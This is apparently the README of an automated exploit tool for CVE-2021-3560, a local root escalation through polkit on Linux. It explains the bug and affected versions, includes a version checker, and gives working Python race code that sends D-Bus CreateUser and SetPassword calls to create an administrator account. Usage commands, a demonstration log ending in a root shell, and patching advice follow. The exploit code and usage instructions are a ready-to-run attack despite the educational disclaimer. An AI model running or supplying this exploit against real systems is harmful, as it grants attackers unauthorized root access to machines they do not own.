# CVE-2021-3560 Polkit Local Privilege Escalation
An automated exploit for the **CVE-2021-3560** vulnerability affecting PolicyKit (Polkit) on Linux systems.
> ⚠️ **WARNING**: This tool is intended for educational and cybersecurity training purposes only in a controlled lab environment. Unauthorized use of this exploit on systems you do not own is illegal.
## 📋 Table of Contents
- [About the Vulnerability](#-about-the-vulnerability)
- [Vulnerable Systems](#-vulnerable-systems)
- [Features](#-features)
- [Prerequisites](#-prerequisites)
- [Installation](#-installation)
- [Usage](#-usage)
- [How It Works](#-how-it-works)
- [Demonstration](#-demonstration)
- [Mitigation](#-mitigation)
- [References](#-references)
## 🔍 About the Vulnerability
**CVE-2021-3560** is a local privilege escalation in PolicyKit (polkit). When polkit cannot look up the UID of a D-Bus caller because that caller has already disconnected, it mishandles the lookup error and carries on as if the caller were UID 0, so the authorization check passes. Triggering this requires winning a race: the requesting process must disconnect after its request is in flight but before polkit has resolved its credentials. A successful exploit lets an unprivileged local user create an administrator account and obtain root.
### Technical Details
- **CVE ID**: CVE-2021-3560
- **Severity**: High (CVSS v3.1 base score 7.8)
- **Type**: Incorrect authorization caused by an unhandled error (CWE-863), exploited through a race condition
- **Impact**: Local Privilege Escalation (LPE)
- **Disclosure Date**: June 2021
### Affected Versions
The vulnerability affects two branches of polkit with different version numbering:
#### Upstream (official versions)
- **Vulnerable**: 0.113 to 0.118
- **Bug introduced**: Commit `bfa5036` (first shipped in version 0.113)
- **Fixed**: Version 0.119+ (commit `a2bf5c9`)
#### Debian/Ubuntu fork (based on 0.105)
- **Vulnerable**: 0.105-26 and later revisions that do not carry a security update
- **Bug introduced**: Commit `f81d021`, backported in revision 0.105-26
- **NOT vulnerable**: Debian 10 "buster" (0.105-25) and anything older
## 💻 Vulnerable Systems
| Distribution | Polkit Version | Vulnerable? |
|---------------------------|-------------------|-------------|
| **Ubuntu 20.04** | 0.105-26ubuntu1 | ✅ Yes |
| Ubuntu 18.04 | 0.105-20 | ❌ No |
| **Debian testing "bullseye"** | 0.105-31+ | ✅ Yes |
| Debian 10 "buster" | 0.105-25 | ❌ No |
| **RHEL 8** | 0.115-11+ | ✅ Yes |
| RHEL 7 | < 0.113 | ❌ No |
| **Fedora 21+** | 0.113+ | ✅ Yes |
| Fedora 20 and earlier | < 0.113 | ❌ No |
> 📝 **Note**: Systems with security patches applied (e.g., ubuntu1.1, deb10u1) are **not** vulnerable.
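As an added example (not part of this project), the version rules from the "Affected Versions" section and the table above written out as a checker. The parsing, the `classify`/`local_version` names and the suffix heuristics (an `ubuntuX.Y` or `+debNNuN` revision means a distribution security update; an RPM release with an extra `.N` after the dist tag, as in `11.el8_4.1`, means an errata rebuild) are assumptions that only mirror the table, so confirm the result against the distribution advisory before relying on it. Because `pkexec --version` prints only the upstream part (`0.105`), the checker deliberately returns "cannot tell" for a bare `0.105`; the package manager is the right source for the Debian/Ubuntu fork.

```python
import re
import shutil
import subprocess

# Added example, not the project's code: the version rules from the
# "Affected Versions" section and the "Vulnerable Systems" table as a checker.
DEBIAN_FORK_FIRST_BAD = 26    # f81d021 was backported in 0.105-26
UPSTREAM_FIRST_BAD = 113      # bfa5036 first shipped in 0.113
UPSTREAM_FIRST_FIXED = 119    # a2bf5c9 shipped in 0.119

_VERSION_RE = re.compile(r"^(?:polkit-)?(\d+)\.(\d+)(?:-(\S+))?$")


def classify(version):
    """Return (state, reason): True = vulnerable, False = not, None = cannot tell.

    Accepts upstream ("0.118"), Debian/Ubuntu fork ("0.105-26ubuntu1.1",
    "0.105-31+deb11u1") and RPM ("polkit-0.115-11.el8_4.1") strings.
    """
    m = _VERSION_RE.match(version.strip())
    if not m or int(m.group(1)) != 0:
        return None, "unrecognised version string: %r" % version
    minor, rev = int(m.group(2)), m.group(3) or ""

    if minor == 105:
        # Debian/Ubuntu fork: upstream part is frozen at 0.105, the state is in the revision
        if not rev:
            return None, "bare 0.105 (what pkexec --version prints) carries no revision"
        rm = re.match(r"^(\d+)(.*)$", rev)
        if not rm:
            return None, "unrecognised Debian revision %r" % rev
        n, rest = int(rm.group(1)), rm.group(2)
        if n < DEBIAN_FORK_FIRST_BAD:
            return False, "0.105-%d predates the backport in 0.105-26" % n
        if re.search(r"ubuntu\d+\.\d+", rest):   # assumption: ubuntuX.Y = security update
            return False, "Ubuntu security update (%s)" % rev
        if re.search(r"\+deb\d+u\d+", rest):    # assumption: +debNNuN = security update
            return False, "Debian security update (%s)" % rev
        return True, "Debian/Ubuntu fork 0.105-%d without security update" % n

    if UPSTREAM_FIRST_BAD <= minor < UPSTREAM_FIRST_FIXED:
        # assumption: an RPM release with a component after the dist tag
        # (11.el8_4.1 rather than 11.el8) is an errata rebuild
        if re.search(r"\.(el|fc)\d+(?:_\d+)?\.\d+$", rev):
            return False, "RPM errata rebuild (%s)" % rev
        return True, "upstream 0.%d is in the vulnerable range 0.113-0.118" % minor
    if minor >= UPSTREAM_FIRST_FIXED:
        return False, "upstream 0.%d includes the fix" % minor
    return False, "upstream 0.%d predates the bug" % minor


def local_version():
    """Installed polkit version as reported by the package manager, or None.

    universal_newlines= rather than text= keeps this working on Python 3.6.
    """
    if shutil.which("dpkg-query"):
        r = subprocess.run(["dpkg-query", "-W", "-f=${Version}", "policykit-1"],
                           stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
                           universal_newlines=True)
        if r.returncode == 0 and r.stdout.strip():
            return r.stdout.strip()
    if shutil.which("rpm"):
        r = subprocess.run(["rpm", "-q", "--qf", "%{VERSION}-%{RELEASE}", "polkit"],
                           stdout=subprocess.PIPE, stderr=subprocess.DEVNULL,
                           universal_newlines=True)
        if r.returncode == 0 and r.stdout.strip():
            return r.stdout.strip()
    return None


if __name__ == "__main__":
    v = local_version()
    state, why = classify(v) if v else (None, "polkit package not found")
    label = {True: "VULNERABLE", False: "not vulnerable", None: "unknown"}[state]
    print("polkit %s: %s (%s)" % (v, label, why))
```

Run it as-is on the target to get a verdict for the installed package, or call `classify()` on a version string copied from `apt-cache policy policykit-1` / `rpm -q polkit`.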
## ✨ Features
- ✅ **Automatic detection** of vulnerability across multiple distributions
- ✅ **Multi-OS support**: Debian, Ubuntu, RHEL, CentOS, Fedora, Arch Linux
- ✅ **Dependency verification** for required tools
- ✅ **Check mode**: Verify vulnerability without exploitation
- ✅ **Adaptive timing**: Automatic measurement of optimal race condition timing
- ✅ **Progress indicators**: Real-time progress display
- ✅ **Colored output**: Clear and easy-to-read interface
- ✅ **Robust error handling**: Explicit messages on failure
## 📦 Prerequisites
### Python Version
- **Python 3.6+** (compatible with older systems like CentOS 8)
### System Dependencies
The exploit requires the following tools (checked automatically at start-up):
- `dbus-send`: sends the method calls to accounts-daemon over the system bus
- `pkexec`: part of PolicyKit
- `id`: verifies that the user was created and which groups it landed in
- `openssl`: generates the password hash (`openssl passwd -6`)
### Required Service
- `accountsservice` (`accounts-daemon`): must be installed and running. It is the privileged D-Bus service that receives `CreateUser`/`SetPassword` and asks polkit to authorize the caller; without it there is nothing to race.
## 🚀 Installation
```bash
# Clone the repository (or download the file)
git clone https://github.com/[your-repo]/CVE-2021-3560_Polkit.git
cd CVE-2021-3560_Polkit
# Make the script executable
chmod +x CVE-2021-3560_Polkit.py
```
## 📖 Usage
### Mode 1: Vulnerability Check (--check)
Check if the system is vulnerable **without** running the exploit:
```bash
python3 CVE-2021-3560_Polkit.py --check
```
**Example output**:
```
[*] ============================================================
[*] CVE-2021-3560 Polkit Vulnerability Checker
[*] ============================================================
[*] Detecting operating system...
[+] OS: Ubuntu 20.04
[*] Checking required dependencies...
[+] Found: dbus-send
[+] Found: pkexec
[+] Found: id
[+] Found: openssl
[*] Detecting Polkit version...
[+] Polkit version: 0.105-26ubuntu1
[+] ============================================================
[+] SYSTEM APPEARS VULNERABLE!
[+] ============================================================
[*] Debian/Ubuntu fork detected (vulnerable since 0.105-26)
```
### Mode 2: Exploitation
Create an administrator account (a member of the `sudo`/`wheel` group) with the given password:
```bash
python3 CVE-2021-3560_Polkit.py -u <username> -p <password>
```
**Example**:
```bash
python3 CVE-2021-3560_Polkit.py -u hacker -p Password123!
```
### Complete Options
```
usage: CVE-2021-3560_Polkit.py [-h] [-u USERNAME] [-p PASSWORD] [-c]
options:
-h, --help Show help
-u, --username Username to create
-p, --password Password for new user
-c, --check Check vulnerability without exploiting
```
## ⚙️ How It Works
The exploit abuses an error-handling bug in polkit's authorization check that can only be reached by winning a race during D-Bus request processing.
### Vulnerability Principle
1. **D-Bus Request**: The unprivileged user sends a `CreateUser` method call to accounts-daemon (`org.freedesktop.Accounts`) over the system bus
2. **Authorization Check**: accounts-daemon asks polkit whether the caller, identified by its unique bus name, may perform the action; polkit in turn asks dbus-daemon for the UID behind that bus name
3. **Race Condition**: If the caller has already disconnected (the `dbus-send` process was killed), the UID lookup fails; polkit does not propagate the error and continues as if the UID were 0 (root), so the action is authorized
4. **User Creation**: accounts-daemon creates the account; with account type 1 (administrator) it is placed in the `sudo`/`wheel` group. The same trick is then repeated for `SetPassword`
### Exploit Steps
```
┌─────────────────────────────────────────────────────────┐
│ 1. Optimal timing measurement │
│ └─> Test execution to calibrate timing │
├─────────────────────────────────────────────────────────┤
│ 2. Exploitation: User creation │
│ └─> Send D-Bus CreateUser request │
│ └─> Kill process at precise moment (race condition) │
│ └─> Verify if user created │
├─────────────────────────────────────────────────────────┤
│ 3. Password hash generation │
│ └─> Using openssl passwd -6 │
├─────────────────────────────────────────────────────────┤
│ 4. Exploitation: Password setting │
│ └─> Send D-Bus SetPassword request │
│ └─> Kill process at precise moment (race condition) │
│ └─> Test login with password │
├─────────────────────────────────────────────────────────┤
│ 5. Privilege escalation │
│ └─> Login with created account │
│ └─> Use sudo if member of sudo group │
└─────────────────────────────────────────────────────────┘
```
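To make the timing step concrete, here is an added example of the race mechanics described above (not the project's code). It builds the same `dbus-send` calls to `org.freedesktop.Accounts` that the GitHub Security Lab write-up uses, starts one, kills it after a delay, and repeats until `id <user>` succeeds. Killing at half of a normal full run is this README's own heuristic; the function names, the 100-attempt cap and the `Lab User` full name are assumptions. `race_once`, `calibrate` and `race_until` are generic and accept any command, which is how they can be tried harmlessly with `sleep` or `true`.

```python
import subprocess
import sys
import time

# Added example, not the project's code: the kill-in-flight race from
# "How It Works", with the calibration heuristic from the demonstration.
ACCOUNTS_DEST = "org.freedesktop.Accounts"
ACCOUNTS_PATH = "/org/freedesktop/Accounts"
MAX_ATTEMPTS = 100   # assumption: the README's per-step maximum


def create_user_cmd(username, fullname, account_type=1):
    """argv for CreateUser. account_type 1 = administrator, which is what
    puts the new account in the sudo/wheel group."""
    return ["dbus-send", "--system", "--dest=" + ACCOUNTS_DEST,
            "--type=method_call", "--print-reply", ACCOUNTS_PATH,
            ACCOUNTS_DEST + ".CreateUser",
            "string:" + username, "string:" + fullname,
            "int32:%d" % account_type]


def set_password_cmd(uid, password_hash, hint="lab"):
    """argv for SetPassword on the per-user object. password_hash is the
    crypt string that `openssl passwd -6` prints."""
    path = "%s/User%d" % (ACCOUNTS_PATH, uid)
    return ["dbus-send", "--system", "--dest=" + ACCOUNTS_DEST,
            "--type=method_call", "--print-reply", path,
            ACCOUNTS_DEST + ".User.SetPassword",
            "string:" + password_hash, "string:" + hint]


def calibrate(argv, runs=5):
    """Mean wall-clock seconds for a full, un-killed run of argv. Against a
    patched or unpatched polkit this run simply gets PermissionDenied."""
    total = 0.0
    for _ in range(runs):
        t0 = time.monotonic()
        subprocess.run(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
        total += time.monotonic() - t0
    return total / runs


def race_once(argv, delay):
    """Start argv and kill it after `delay` seconds. Returns True if it was
    still running when killed (the reply had not come back yet, which is the
    precondition for the race), False if it had already exited."""
    proc = subprocess.Popen(argv, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    time.sleep(delay)
    if proc.poll() is None:
        proc.kill()
        proc.wait()
        return True
    return False


def user_exists(username):
    return subprocess.run(["id", username], stdout=subprocess.DEVNULL,
                          stderr=subprocess.DEVNULL).returncode == 0


def race_until(argv, delay, success, attempts=MAX_ATTEMPTS):
    """Repeat race_once until success() holds. Returns the attempt number
    that succeeded, or 0 if every attempt failed."""
    for i in range(1, attempts + 1):
        race_once(argv, delay)
        if success():
            return i
    return 0


if __name__ == "__main__":
    username = sys.argv[1] if len(sys.argv) > 1 else "pwned"
    argv = create_user_cmd(username, "Lab User")
    full = calibrate(argv)
    delay = full / 2          # README heuristic: kill halfway through a normal run
    print("full run ~%.3fs, killing at %.3fs" % (full, delay))
    n = race_until(argv, delay, lambda: user_exists(username))
    print("user created after %d attempt(s)" % n if n else "gave up after %d attempts" % MAX_ATTEMPTS)
```

`race_once` returning False on most attempts means the delay is too long (the reply arrives before the kill); a delay so short that `dbus-send` has not yet sent the call produces nothing at all, which is why the calibration run matters more than the attempt count.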
## 🎬 Demonstration
### Typical Exploitation Scenario
```bash
# 1. Check vulnerability
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py --check
[+] SYSTEM APPEARS VULNERABLE!
# 2. Launch exploit
user@vulnerable:~$ python3 CVE-2021-3560_Polkit.py -u pwned -p Pwn3d123!
╔═══════════════════════════════════════════════════════════╗
║ CVE-2021-3560 Polkit Privilege Escalation ║
╚═══════════════════════════════════════════════════════════╝
[*] Creating user 'pwned' using race condition timing attack...
[*] Measuring command execution time...
[*] Command takes ~0.045s, using 0.023s timing
[*] Attempting race condition exploit, please wait...
[+] User 'pwned' created successfully! UID: 1001
[*] User is member of groups: 1001(pwned) 27(sudo)
[*] Generating password hash...
[+] Password hash generated
[*] Setting password for user 'pwned'...
[+] Password set successfully!
╔═══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL! ║
╚═══════════════════════════════════════════════════════════╝
[+] User 'pwned' created with password 'Pwn3d123!'
[*] User should be member of 'sudo' group for privilege escalation
[*] Switching to user 'pwned'...
# 3. Get root
pwned@vulnerable:~$ sudo su
root@vulnerable:~# id
uid=0(root) gid=0(root) groups=0(root)
```
## 🛡️ Mitigation
### For System Administrators
1. **Update PolicyKit**:
```bash
# Debian/Ubuntu
sudo apt update && sudo apt upgrade policykit-1
# RHEL/CentOS/Fedora
sudo yum update polkit
# or
sudo dnf update polkit
```
2. **Check the installed package version** (`pkexec --version` prints only the upstream part, e.g. `0.105`, so it cannot tell a patched Debian/Ubuntu build from an unpatched one):
```bash
# Debian/Ubuntu
apt-cache policy policykit-1
# RHEL/CentOS/Fedora
rpm -q polkit
# Must be >= 0.119 (upstream) or carry the distribution's security update
```
3. **Verify security patches**:
```bash
# Debian/Ubuntu
apt-cache policy policykit-1
# RHEL/CentOS/Fedora
rpm -q --changelog polkit | grep CVE-2021-3560
```
### Minimum Secure Version
- **Upstream**: ≥ 0.119
- **Ubuntu 20.04**: 0.105-26ubuntu1.**1** or higher
- **Debian 11**: 0.105-31+deb11u**1** or higher
- **RHEL 8**: polkit-0.115-11.el8_4.**1** or higher
## 📚 References
### Official Articles and Documentation
- **GitHub Security Lab**: [Privilege escalation with Polkit: How to get root on Linux with a seven-year-old bug](https://github.blog/security/vulnerability-research/privilege-escalation-polkit-root-on-linux-with-bug/)
- **Red Hat CVE**: [CVE-2021-3560](https://access.redhat.com/security/cve/cve-2021-3560)
- **MITRE CVE**: [CVE-2021-3560](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3560)
- **NVD NIST**: [CVE-2021-3560 Detail](https://nvd.nist.gov/vuln/detail/CVE-2021-3560)
### TryHackMe Resources
- **TryHackMe Room**: [Polkit CVE-2021-3560 (Practice)](https://tryhackme.com/room/polkit)
### Patches and Fixes
- **GitLab Polkit**: [Fix commit](https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683)
## 📝 Important Notes
### Success Rate
The exploit relies on a race condition, which means:
- ✅ Generally works in **1-20 attempts**
- ⏱️ Timing is **critical** (automatically calibrated)
- 🔄 Maximum **100 attempts** per step (configurable)
- 📡 Better success rate via **SSH** rather than local console
### Limitations
- ❌ Does **not** work on patched systems
- ❌ Requires **accountsservice** installed and active
- ❌ User must have access to **system D-Bus**
- ❌ Some environments (containers, specific VMs) may block the exploit
### Patched Versions (NOT Vulnerable)
The following versions include security patches and are **NOT vulnerable**:
- `0.105-26ubuntu1.1`, `0.105-26ubuntu1.2`, `0.105-26ubuntu1.3`, etc. (Ubuntu patched)
- `0.105-26ubuntu2.1`, `0.105-26ubuntu2.2`, etc. (Ubuntu patched)
- `0.105-31+deb11u1` (Debian 11 patched)
- `polkit-0.115-11.el8_4.1` (RHEL 8 patched)
**Note**: If check mode reports the system as vulnerable but every attempt fails with `PermissionDenied`, the package is most likely patched: a fixed polkit returns an error for the disconnected caller instead of treating it as root. The checker now recognises the patched version strings listed above.
### Debugging
If the exploit fails:
1. **Check the Python version** (if you get `TypeError: __init__() got an unexpected keyword argument 'capture_output'`, the interpreter is older than 3.7, where `subprocess.run(capture_output=...)` was added; the script avoids that argument so that 3.6 works, so either the interpreter is older than 3.6 or you are running an older copy of the script):
```bash
python3 --version
# Should be 3.6 or higher
```
2. **Check whether the package is patched** (`pkexec --version` prints only `0.105` on Debian/Ubuntu and never the package revision, so use the package manager):
```bash
# Debian/Ubuntu: a revision such as 0.105-26ubuntu1.X with X > 0, or +debNNuN, is patched
apt-cache policy policykit-1
# RHEL/CentOS/Fedora
rpm -q --changelog polkit | grep CVE-2021-3560
```
3. **Check accountsservice**:
```bash
systemctl status accounts-daemon
```
4. **Check D-Bus**:
```bash
dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
```
5. **Launch from SSH** rather than local console
6. **Adjust timing** by modifying `optimal_timing` in the code
## 👤 Author
**Seimu**
## 📄 License
This project is intended for educational purposes only. Use of this code for unauthorized activities is strictly prohibited and may result in legal action.
---
> ⚠️ **Disclaimer**: The author is not responsible for any misuse of this tool. Use it only in authorized test environments.